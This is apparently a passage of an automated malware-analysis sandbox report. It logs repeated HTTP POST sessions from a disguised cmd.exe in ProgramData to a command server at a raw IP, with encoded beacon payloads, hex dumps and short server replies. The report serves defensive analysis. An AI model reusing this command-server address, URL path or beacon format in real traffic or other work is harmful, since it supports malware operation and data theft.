                                                                                                                                  Data Ascii: ZU\S\GZZZ\UQYVTWV_]BP\ZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%C++3-&&!Z%<3?((4"&&*U :& ?('_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:10.903012991 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:11.037098885 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:10 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  35192.168.2.449844193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:10.332170963 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1848
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:10.684881926 CET1848OUTData Raw: 5a 56 5c 5c 59 44 5a 53 5a 5c 55 51 59 5e 54 54 56 59 5d 44 50 55 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZV\\YDZSZ\UQY^TTVY]DPUZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(V/$=!]%=[%Z<[<-)4)%-:)<:14T<'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:10.990438938 CET25INHTTP/1.1 100 Continue


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  36192.168.2.449850193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:11.155899048 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:11.513128996 CET2560OUTData Raw: 5a 55 5c 53 59 43 5f 56 5a 5c 55 51 59 58 54 52 56 50 5d 45 50 56 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZU\SYC_VZ\UQYXTRVP]EPVZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%?3;'.&'7!2<+>(($*U2:)#396:74'<'_!%Y)?
                                                                                                                                  Jan 3, 2025 20:48:11.864078045 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:12.070692062 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:11 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  37192.168.2.449857193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:12.379986048 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:12.758991003 CET2560OUTData Raw: 5f 56 5c 52 59 42 5f 56 5a 5c 55 51 59 56 54 57 56 5c 5d 45 50 56 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _V\RYB_VZ\UQYVTWV\]EPVZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%?#^&-&%:% >-(<5%>)#3-C5Y '3U+='_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:13.014904976 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:13.145898104 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:12 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  38192.168.2.449863193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:13.266545057 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:13.622466087 CET2560OUTData Raw: 5f 5e 59 5d 59 44 5f 56 5a 5c 55 51 59 5d 54 53 56 59 5d 49 50 56 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _^Y]YD_VZ\UQY]TSVY]IPVZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%(#]0!Z2%$]+$+4>U%9W*3(95*"7?V+='_!%Y)+
                                                                                                                                  Jan 3, 2025 20:48:13.910242081 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:14.043957949 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:13 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  39192.168.2.449870193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:14.172398090 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:14.528800011 CET2560OUTData Raw: 5a 53 59 59 5c 46 5f 51 5a 5c 55 51 59 58 54 5a 56 50 5d 48 50 5d 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZSYY\F_QZ\UQYXTZVP]HP]ZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%G( ]3.=27]&/<>-(?B5%!>?.&#,+='_!%Y)?
                                                                                                                                  Jan 3, 2025 20:48:14.838407040 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:14.967736959 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:14 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  40192.168.2.449881193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:16.245429039 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:16.591579914 CET2560OUTData Raw: 5f 5f 59 5d 59 43 5a 5a 5a 5c 55 51 59 5b 54 50 56 5d 5d 40 50 50 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: __Y]YCZZZ\UQY[TPV]]@PPZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F(3$=*&451?#+T?%=9T(#/[96*"48)='_!%Y)3


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  41192.168.2.449882193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:16.246442080 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1848
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:16.591432095 CET1848OUTData Raw: 5f 53 5c 5f 59 43 5f 57 5a 5c 55 51 59 5e 54 56 56 5d 5d 44 50 53 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _S\_YC_WZ\UQY^TVV]]DPSZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%C+0'!&%<?-;<&Q1>=#9&)\77+='_!%Y)3
                                                                                                                                  Jan 3, 2025 20:48:16.886778116 CET405INHTTP/1.1 100 Continue
                                                                                                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 33 20 4a 61 6e 20 32 30 32 35 20 31 39 3a 34 38 3a 31 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 32 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 09 1e 26 5b 24 18 28 14 26 28 28 0b 33 03 2a 14 3c 02 23 08 2c 21 28 5e 35 3a 02 0f 2a 55 3b 02 3d 2c 2c 5a 36 01 0b 08 35 11 22 00 28 3a 23 5b 03 1d 22 1c 35 0c 22 10 32 2a 32 04 2f 30 06 45 32 13 39 12 2a 3e 2e 0a 20 07 26 1f 35 3e 38 53 38 20 25 11 27 05 2f 5f 3f 13 25 01 27 15 21 51 00 10 3a 09 27 33 35 5d 24 2c 21 07 24 2d [TRUNCATED]
                                                                                                                                  Data Ascii: HTTP/1.1 200 OKDate: Fri, 03 Jan 2025 19:48:16 GMTServer: Apache/2.4.41 (Ubuntu)Vary: Accept-EncodingContent-Length: 152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8&[$(&((3*<#,!(^5:*U;=,,Z65"(:#["5"2*2/0E29*>. &5>8S8 %'/_?%'!Q:'35]$,!$-:0#5Z!2^",2,Q&T/607=)&"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  42192.168.2.449888193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:17.017426014 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:17.372464895 CET2560OUTData Raw: 5f 56 5c 52 59 41 5a 55 5a 5c 55 51 59 5f 54 53 56 58 5d 44 50 5d 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _V\RYAZUZ\UQY_TSVX]DP]ZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+V<0>=]2'>1$X+=+*T&:=#',5: 7?V<'_!%Y)#
                                                                                                                                  Jan 3, 2025 20:48:17.656760931 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:17.785247087 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:17 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  43192.168.2.449893193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:17.904280901 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:18.316514015 CET2560OUTData Raw: 5f 55 5c 5f 5c 41 5f 56 5a 5c 55 51 59 5d 54 55 56 5e 5d 41 50 50 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _U\_\A_VZ\UQY]TUV^]APPZ_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B< <'.)Y162? >-<?$&X)V>00,6= (<='_!%Y)+
                                                                                                                                  Jan 3, 2025 20:48:18.587204933 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:18.720141888 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:18 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  44192.168.2.449900193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:18.843574047 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:48:19.202919006 CET2560OUTData Raw: 5f 52 5c 5d 5c 40 5f 55 5a 5c 55 51 59 59 54 57 56 58 5d 48 50 56 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _R\]\@_UZ\UQYYTWVX]HPVZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+##$927%/,\<[?T(B%%-")U<- ?T(-'_!%Y)
                                                                                                                                  Jan 3, 2025 20:48:19.546940088 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:19.681186914 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:19 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  45192.168.2.449906193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:19.814526081 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:20.169392109 CET2560OUTData Raw: 5f 50 5c 5b 5c 43 5a 52 5a 5c 55 51 59 5f 54 54 56 58 5d 43 50 57 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _P\[\CZRZ\UQY_TTVX]CPWZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F<0$3!Z'$=Z%(\<V+P&>U#X-64/R?='_!%Y)#
                                                                                                                                  Jan 3, 2025 20:48:20.447428942 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:20.576369047 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:20 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  46192.168.2.449912193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:48:20.721343040 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:48:21.159338951 CET2560OUTData Raw: 5f 57 59 58 5c 44 5a 55 5a 5c 55 51 59 5d 54 55 56 51 5d 45 50 55 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _WYX\DZUZ\UQY]TUVQ]EPUZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&< $&'.2?V+%$.*(3?X.5!X"7R<='_!%Y)+
                                                                                                                                  Jan 3, 2025 20:48:21.404231071 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:48:21.538444042 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:48:21 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
